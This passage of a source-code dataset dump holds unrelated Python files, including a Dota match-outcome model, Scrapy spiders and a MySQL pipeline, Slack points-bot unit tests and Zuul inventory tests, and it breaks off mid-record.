max_dist\r\n\r\n def replace(self, word):\r\n if self.spell_dict.check(word):\r\n return word\r\n\r\n suggestions = self.spell_dict.suggest(word)\r\n if suggestions and edit_distance(word, suggestions[0]) <= self.max_dist:\r\n return suggestions[0]\r\n else:\r\n return word\r\n\r\n#Class for replacing negative words with word's antonyms:\r\nclass NegationRemover:\r\n def __init__(self, fileName):\r\n self.ant_list = yaml.load(open(fileName))\r\n\r\n def remove(self, word): \r\n return self.ant_list.get(word, word)\r\n\r\n def remove_negations(self, sent):\r\n i, l = 0, len(sent)\r\n words = []\r\n while i < l: \r\n word = sent[i]\r\n if word == 'not' and i+1 < 
l:\r\n antonym = self.remove(sent[i+1])\r\n if antonym:\r\n words.append(antonym)\r\n i += 2\r\n continue\r\n \r\n words.append(word)\r\n i += 1\r\n \r\n return words\r\n","sub_path":"Training and Testing/prepro_lib/text_cleaner.py","file_name":"text_cleaner.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"208243924","text":"import datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\npd.set_option('display.max_columns', None)\r\ndataframe = pd.read_csv('features.csv', index_col='match_id')\r\ndataframe.head()\r\ndataframe.drop([\"duration\", \"tower_status_radiant\", \"tower_status_dire\", \"barracks_status_radiant\",\r\n \"barracks_status_dire\", ], axis=1, inplace=True)\r\ncountna = len(dataframe) - dataframe.count()\r\nprint(countna[countna > 0].sort_values(ascending=False))\r\ndataframe.fillna(0, inplace=True)\r\n\r\nX_train = dataframe.drop(\"radiant_win\", axis=1)\r\ny_train = dataframe[\"radiant_win\"]\r\n\r\nCV = KFold(n_splits=5, shuffle=True, random_state=42)\r\n\r\n\r\ndef score_trees(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for n_estimators in [10, 20, 30, 50]:\r\n print(f\"n_estimators={n_estimators}\")\r\n model_trees = GradientBoostingClassifier(n_estimators=n_estimators, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model_trees, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[n_estimators] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\nscores = score_trees(X_train, y_train)\r\n\r\nscaler = StandardScaler()\r\nX_train = pd.DataFrame(scaler.fit_transform(X_train), index=X_train.index, columns=X_train.columns)\r\n\r\n\r\ndef score_linear(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for i in range(-5, 6):\r\n C = 10.0 ** i\r\n\r\n print(f\"C={C}\")\r\n model = LogisticRegression(C=C, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[i] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\ndef best_linear_score(scores: pd.Series):\r\n best_iter = scores.sort_values(ascending=False).head(1)\r\n best_C = 10.0 ** best_iter.index[0]\r\n print(f\"best_iter.index[0] = {best_iter.index}\")\r\n best_score = best_iter.values[0]\r\n\r\n print(f\"Наилучшее значение AUC-ROC при C = {best_C:.2f} равно {best_score:.2f}.\")\r\n\r\n\r\nbest_linear_score(scores)\r\n\r\nhero_columns = [f\"r{i}_hero\" for i in range(1, 6)] + [f\"d{i}_hero\" for i in range(1, 6)]\r\ncat_columns = [\"lobby_type\"] + hero_columns\r\nX_train.drop(cat_columns, axis=1, inplace=True)\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\n\r\nunique_heroes = np.unique(dataframe[hero_columns].values.ravel())\r\nN = max(unique_heroes)\r\nprint(f\"Число уникальных героев в train: {len(unique_heroes)}. 
Максимальный ID героя: {N}.\")\r\n\r\n\r\ndef pick(data: pd.DataFrame) -> pd.DataFrame:\r\n X_pick = np.zeros((data.shape[0], N))\r\n\r\n for i, match_id in enumerate(data.index):\r\n for p in range(1, 6):\r\n X_pick[i, data.loc[match_id, f\"r{p}_hero\"] - 1] = 1\r\n X_pick[i, data.loc[match_id, f\"d{p}_hero\"] - 1] = -1\r\n\r\n return pd.DataFrame(X_pick, index=data.index, columns=[f\"hero_{i}\" for i in range(N)])\r\n\r\n\r\nX_pick = pick(dataframe)\r\nX_pick.head()\r\nX_train = pd.concat([X_train, X_pick], axis=1)\r\n\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\nmodel = LogisticRegression(C=0.1, random_state=42)\r\nmodel.fit(X_train, y_train)\r\n\r\ntestframe = pd.read_csv(\"features_test.csv\", index_col=\"match_id\")\r\ntestframe.fillna(0, inplace=True)\r\n\r\nX_test = pd.DataFrame(scaler.transform(testframe), index=testframe.index, columns=testframe.columns)\r\nX_test.drop(cat_columns, axis=1, inplace=True)\r\nX_test = pd.concat([X_test, pick(testframe)], axis=1)\r\nX_test.head()\r\n\r\npredictions = pd.Series(model.predict_proba(X_test)[:, 1])\r\nprint(predictions.describe())\r\n","sub_path":"ML/final_task.py","file_name":"final_task.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"634553461","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport pymysql\n\nclass LottoPipeline:\n def process_item(self, item, spider):\n return item\n\nclass LottoInsertNumberPipeline:\n\n def open_spider(self, spider):\n print(\"################################# open spider\")\n if spider.name == \"LottoSpider3\":\n conn = pymysql.connect(host=\"localhost\",\n database=\"exampledb\",\n user=\"root\",\n password=\"mysql\",\n charset=\"utf8\")\n \n self.conn = conn\n\n # 아래 with 구문은 테스트용 코드\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"DELETE FROM WINNING_NUMBERS\"\n cursor.execute(sql) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n\n def process_item(self, item, spider):\n print(\"################################# process item\")\n if spider.name == \"LottoSpider3\":\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"INSERT INTO winning_numbers values (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, item.to_list()) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n return item\n\n def close_spider(self, spider):\n print(\"################################# close spider\")\n if spider.name == \"LottoSpider3\" and self.conn != None:\n self.conn.close()\n ","sub_path":"workspaces/python-basic/scrapy/lotto/lotto/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"431668234","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Products\\ATGoogleMaps\\config.py\n# Compiled at: 2010-06-03 09:07:26\n\"\"\"Common configuration constants\n\"\"\"\nPROJECTNAME = 'ATGoogleMaps'\nADD_PERMISSIONS = {'GMap': 'ATGoogleMaps: Add GMap', \n 'GMarker': 'ATGoogleMaps: Add GMarker', \n 'GPolyline': 
'ATGoogleMaps: Add GPolyline'}","sub_path":"pycfiles/Products.ATGoogleMaps-0.7-py2.6/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"35268470","text":"\"\"\"\nTest point counter functionality\n\"\"\"\nimport unittest\n\nfrom google.auth import exceptions\n\nfrom main import PointCounter, get_client\nfrom consts import ADMIN_CHANNEL\n\nTEST_PREFECTS = [\"prefect\"]\nTEST_POINTS = \"dataset/hackathon.test.json\"\n\n\nclass TestPointCounter(unittest.TestCase):\n \"\"\"Initialize a point counter and test response messages\"\"\"\n\n def setUp(self):\n self.p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n\n def test_post_update(self):\n try:\n get_client()\n except exceptions.DefaultCredentialsError:\n print(\"Skipping bucket test - no permission file found!\")\n return\n\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS, reset=True)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.post_update()\n\n p2 = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n self.assertEqual(p2.points['Gryffindor'], 6)\n\n def test_adding_points(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"10 points to Gryffindor\", TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 10 points\", msg[0])\n\n def test_parsing_edge_case(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n edge_cases = [\n \"1 point to gryffindor for <@U15BW22P9> ... 5 years ago\",\n \"....1 point to gryffindor\",\n ]\n for slack_msg in edge_cases:\n msg = p.award_points(\n slack_msg,\n TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 1 point\", msg[0])\n\n def test_adding_points_not_by_prefect(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"6 points to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"oNe point to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point_to_slytherin(self):\n msg = self.p.award_points(\n \"1 point to slytherin for @benkraft making slackbot\"\n \" listen for '911' mentions in 1s and 0s\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Slytherin gets 1 point\", m)\n\n def test_subtracting_one_point_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"prefect\")\n self.assertIn(\"<@prefect> Gryffindor loses 1 point\", msgs[0])\n\n def test_subtracting_one_point_not_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"harry potter\")\n self.assertEqual(len(msgs), 0)\n\n def test_works_with_usernames(self):\n message = \"1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"nymphadora tonks\"):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_with_prefect(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_with_prefect_with_reason(self):\n message = 
\"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R> for making reason works\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw for making reason works :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_takes_away_with_prefect(self):\n self.p.award_points(\"10 points to Gryffindor\",\n TEST_PREFECTS[0], channel=ADMIN_CHANNEL)\n message = \"Dumbledore takes away 1 point from Gryffindor <@U0NJ1PH1R> because of breaking reason\"\n for m in self.p.award_points(message, \"prefect\"):\n self.assertEqual(\n m[0], \"takes away 1 point from Gryffindor for breaking reason \"\n \":gryffindor: :small_red_triangle_down:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_normal(self):\n message = \"awards 1 point to ravenclaw <@U0NJ1PH1R> for cheating\"\n for m in self.p.award_points(message, \"nymphadora tonks\", channel=ADMIN_CHANNEL):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_says_with_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL)\n self.assertIsInstance(msg[0], tuple)\n msg_text, char = msg[0]\n self.assertEqual(msg_text, \"ho ho ho :party-khan:\")\n self.assertEqual(char, \"dumbledore\")\n\n def test_works_with_dumbledore_says_no_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(\n message, \"Harry potter\", channel=ADMIN_CHANNEL)\n self.assertEqual(len(msg), 0)\n\n def test_calculate_standings(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.award_points(\"7 points to Ravenclaw\", TEST_PREFECTS[0])\n p.award_points(\"8 points to Hufflepuff\", TEST_PREFECTS[0])\n p.award_points(\"9 points to Slytherin\", TEST_PREFECTS[0])\n for m in p.print_status():\n print(m)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7606733","text":"\"\"\"\n创建三个学校且三个学校的设施内容等都是一致.\n\"\"\"\nclass School(object):\n def __init__(self, name, address):\n self.name = name\n self.address = address\n\n def speech(self):\n print('讲课')\n\nobj1 = School('老男孩北京校区', '美丽富饶的沙河')\nobj2 = School('老男孩上海校区', '浦东新区')\nobj3 = School('老男孩深圳校区', '南山区')\n\n\nclass Teacher(object):\n def __init__(self, name, age, salary):\n self.name = name\n self.age = age\n self.__salary = salary\n self.school = None\n\nt1 = Teacher('李杰', 19, 188888)\nt2 = Teacher('艳涛', 18, 60)\nt3 = Teacher('女神', 16, 900000)\n# ############## 老师分配校区\nt1.school = obj1\nt2.school = obj1\nt3.school = obj2\n# ####################################\n# 查看t1老师,所在的校区名称/地址\nprint(t1.school.name)\nprint(t1.school.address)\nprint(t1.name)\nprint(t1.age)\nt1.school.speech()\n","sub_path":"p1_basic/day22_26oop/day23/11_嵌套.py","file_name":"11_嵌套.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"131952477","text":"import os\nimport yaml\nimport pandas as pd\nimport argparse\n\ndef read_params(config_path):\n with open(config_path) as yaml_file:\n config=yaml.safe_load(yaml_file)\n return config\n\ndef get_data(config_path):\n config= 
read_params(config_path)\n data_path=config['data_source']['s3_source']\n df=pd.read_csv(data_path,sep=',',encoding='utf-8')\n #df = pd.get_dummies(df, columns = ['famhist'], drop_first=True)\n #df.drop(\"sbp\",axis=1, inplace=True)\n return df\n\nif __name__==\"__main__\":\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", default=\"param.yaml\")\n parsed_args = args.parse_args()\n data = get_data(config_path = parsed_args.config)","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"560120074","text":"# -*- coding: utf8 -*-\nfrom datetime import datetime\nimport re\n\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.selector import Selector\n\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\nfrom alascrapy.spiders.base_spiders.bazaarvoice_spider import BVNoSeleniumSpider\nfrom alascrapy.lib.generic import get_full_url, date_format\nimport alascrapy.lib.dao.incremental_scraping as incremental_utils\nfrom alascrapy.items import CategoryItem, ProductItem, ReviewItem, ProductIdItem\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom alascrapy.lib.selenium_browser import SeleniumBrowser\n\n\nclass Cyberphoto_seSpider(AlaSpider):\n name = 'cyberphoto_se'\n allowed_domains = ['cyberphoto.se']\n start_urls = ['https://www.cyberphoto.se/bloggen']\n\n \n def parse(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n url_xpath = \"//span[contains(.,'ta sida')]/../@href\"\n single_url = self.extract(response.xpath(url_xpath))\n single_url='/bloggen'+single_url\n if single_url:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n return\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.parse)\n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n urls_xpath = \"//div[@class='blogg_big_container'][contains(.,'Test')]//a[contains(@href,'article')]/@href\"\n params_regex = {}\n urls = self.extract_list(response.xpath(urls_xpath))\n \n for single_url in urls:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n continue\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.level_2)\n \n \n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n \n def level_2(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n category_leaf_xpath = \"(//div[@id='breadcrumb_area']/a/text())[last()]\"\n category_path_xpath = \"//div[@id='breadcrumb_area']/a/text()\"\n category = CategoryItem()\n category['category_url'] = original_url\n category['category_leaf'] = self.extract(response.xpath(category_leaf_xpath))\n category['category_path'] = self.extract_all(response.xpath(category_path_xpath), ' | ')\n if self.should_skip_category(category):\n return\n yield category\n\n product_xpaths = { \n \n \n 
\"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \n \n \"OriginalCategoryName\":\"//div[@id='breadcrumb_area']/a/text()\",\n \n \n \"PicURL\":\"(//div[@class='picture_container']/img/@src)[1]\",\n \n \n }\n product = self.init_item_by_xpaths(response, \"product\", product_xpaths)\n product['TestUrl'] = original_url\n picurl = product.get(\"PicURL\", \"\")\n if picurl and picurl[:2] == \"//\":\n product[\"PicURL\"] = \"https:\" + product[\"PicURL\"]\n if picurl and picurl[:1] == \"/\":\n product[\"PicURL\"] = get_full_url(original_url, picurl)\n manuf = product.get(\"ProductManufacturer\", \"\")\n if manuf == \"\" and \"\"[:2] != \"//\":\n product[\"ProductManufacturer\"] = \"\"\n try:\n product[\"OriginalCategoryName\"] = category['category_path']\n except:\n pass\n ocn = product.get(\"OriginalCategoryName\", \"\")\n if ocn == \"\" and \"//div[@id='breadcrumb_area']/a/text()\"[:2] != \"//\":\n product[\"OriginalCategoryName\"] = \"//div[@id='breadcrumb_area']/a/text()\"\n review_xpaths = { \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \"TestDateText\":\"//p[contains(.,'Testad') and contains(.,'av')]/text()\",\n \"TestPros\":\"//*[contains(text(),'Plus') or contains(text(),'Mycket')]/../text()[normalize-space()]\",\n \"TestCons\":\"//*[contains(text(),'Minus') or contains(text(),'Mindre')]/../text()[normalize-space()]\",\n \"TestTitle\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\", \n }\n summary = self.extract_xpath(response, \"//div[@class='tabcontent']//p[text()][1]/text()\")\n verdict = self.extract_all_xpath(response, \n \"//*[contains(text(),'Slutsats') or contains(text(),'Sammanfattning')]/../text()[normalize-space()]\",\n separator=\"\\n\")\n match1 = re.search('Slutsats\\n+([^\\n]+)', verdict)\n match2 = re.search('Sammanfattning\\n+([^\\n]+)', verdict)\n if match1:\n verdict = match1.group(1)\n elif match2:\n verdict = match2.group(1)\n \n\n review = self.init_item_by_xpaths(response, \"review\", review_xpaths)\n review['TestUrl'] = original_url\n review['TestSummary'] = summary\n review['TestVerdict'] = verdict\n\n try:\n review['ProductName'] = product['ProductName']\n review['source_internal_id'] = product['source_internal_id']\n except:\n pass\n awpic_link = review.get(\"AwardPic\", \"\")\n if awpic_link and awpic_link[:2] == \"//\":\n review[\"AwardPic\"] = \"https:\" + review[\"AwardPic\"]\n if awpic_link and awpic_link[:1] == \"/\":\n review[\"AwardPic\"] = get_full_url(original_url, awpic_link)\n\n matches = None\n field_value = review.get(\"TestDateText\", \"\")\n if field_value:\n matches = re.search(\"(\\d{4}-\\d{2}-\\d{2})\", field_value, re.IGNORECASE)\n if matches:\n review[\"TestDateText\"] = matches.group(1)\n \n\n review[\"DBaseCategoryName\"] = \"PRO\"\n \n\n yield product\n\n\n \n \n yield review\n \n","sub_path":"alascrapy/spiders/cyberphoto_se.py","file_name":"cyberphoto_se.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"23010831","text":"from Report import Report\n\nclass PPGReceivablesReportFactory(object):\n\n def __init__(self, projectdatabase, **kw):\n self.projectdatabase = projectdatabase\n self.params = kw\n\n def getReport(self):\n # create and fill the report\n report = Report('PPG Recievables Report')\n report.setReportHeaders((\n 'PPG Recievables Report',\n ),)\n report.setTableHeaders(((\n 'IMIS No.',\n 'Project Title',\n 'Executing Agency',\n 
'GEF Grant',\n 'Total Disbursements',\n 'Total Expenditures',\n 'Receivable/(Payable)',\n ),))\n report.setTableRows(self.getReportData())\n # report.setTableTotals([])\n # report.setReportFooters()\n return report\n\n def getReportData(self):\n projects = self.params.get('projects', None)\n result = []\n for project in projects:\n ppg = project.fmi_folder.get('ppg', None)\n if ppg is not None:\n result.append((\n ppg.getIMISNumber(),\n project.project_general_info.Title(),\n project.project_general_info.getLeadExecutingAgencyNames(),\n ppg.getCommittedGEFGrant(),\n ppg.getSumCashDisbursements(),\n ppg.getSumYearlyExpenditures(),\n ppg.getAmountReceivable(),\n ))\n return result\n","sub_path":"unep.project-database/trunk/reports/PPGReceivablesReport.py","file_name":"PPGReceivablesReport.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"428424840","text":"# Copyright 2017 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport os\n\nimport yaml\n\nfrom tests.base import AnsibleZuulTestCase\nfrom tests.base import ZuulTestCase\n\n\nclass TestInventoryBase(ZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def setUp(self, python_path=None):\n super(TestInventoryBase, self).setUp()\n if python_path:\n self.fake_nodepool.python_path = python_path\n self.executor_server.hold_jobs_in_build = True\n A = self.fake_gerrit.addFakeChange('org/project', 'master', 'A')\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n\n def _get_build_inventory(self, name):\n build = self.getBuildByName(name)\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n return yaml.safe_load(open(inv_path, 'r'))\n\n def _get_setup_inventory(self, name):\n build = self.getBuildByName(name)\n setup_inv_path = os.path.join(build.jobdir.root, 'ansible',\n 'setup-inventory.yaml')\n return yaml.safe_load(open(setup_inv_path, 'r'))\n\n\nclass TestInventoryPythonPath(TestInventoryBase):\n\n def setUp(self):\n super(TestInventoryPythonPath, self).setUp(python_path='fake-python')\n\n def test_single_inventory(self):\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n 'fake-python', node_vars['ansible_python_interpreter'])\n\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass 
TestInventory(TestInventoryBase):\n\n def test_single_inventory(self):\n\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n '/usr/bin/python2', node_vars['ansible_python_interpreter'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_single_inventory_list(self):\n\n inventory = self._get_build_inventory('single-inventory-list')\n\n all_nodes = ('compute', 'controller')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory-list')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_group_inventory(self):\n\n inventory = self._get_build_inventory('group-inventory')\n\n all_nodes = ('controller', 'compute1', 'compute2')\n self.assertIn('all', inventory)\n self.assertIn('children', inventory['all'])\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for group_name in ('ceph-osd', 'ceph-monitor'):\n self.assertIn(group_name, inventory['all']['children'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn(node_name,\n inventory['all']['children']\n ['ceph-monitor']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'group-inventory')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_hostvars_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n\n all_nodes = ('default', 'fakeuser')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n # check if the nodes use the correct username\n if node_name == 'fakeuser':\n username = 'fakeuser'\n else:\n username = 'zuul'\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_user'], username)\n\n # check if the nodes use the correct or no ansible_connection\n if node_name == 'windows':\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_connection'],\n 'winrm')\n else:\n self.assertEqual(\n 'local',\n inventory['all']['hosts'][node_name]['ansible_connection'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_setup_inventory(self):\n\n setup_inventory = self._get_setup_inventory('hostvars-inventory')\n inventory = 
self._get_build_inventory('hostvars-inventory')\n\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n\n self.assertIn('default', setup_inventory['all']['hosts'])\n self.assertIn('fakeuser', setup_inventory['all']['hosts'])\n self.assertIn('windows', setup_inventory['all']['hosts'])\n self.assertNotIn('network', setup_inventory['all']['hosts'])\n self.assertIn('default', inventory['all']['hosts'])\n self.assertIn('fakeuser', inventory['all']['hosts'])\n self.assertIn('windows', inventory['all']['hosts'])\n self.assertIn('network', inventory['all']['hosts'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestAnsibleInventory(AnsibleZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def _get_file(self, build, path):\n p = os.path.join(build.jobdir.root, path)\n with open(p) as f:\n return f.read()\n\n def _jinja2_message(self, expected_message):\n\n # This test runs a bit long and needs extra time.\n self.wait_timeout = 120\n # Keep the jobdir around to check inventory\n self.executor_server.keep_jobdir = True\n # Output extra ansible info so we might see errors.\n self.executor_server.verbose = True\n A = self.fake_gerrit.addFakeChange(\n 'org/project2', 'master', expected_message)\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n self.assertHistory([\n dict(name='jinja2-message', result='SUCCESS', changes='1,1')])\n\n build = self.history[0]\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n inventory = yaml.safe_load(open(inv_path, 'r'))\n\n decoded_message = base64.b64decode(\n inventory['all']['vars']['zuul']['message']).decode('utf-8')\n self.assertEqual(decoded_message, expected_message)\n\n obtained_message = 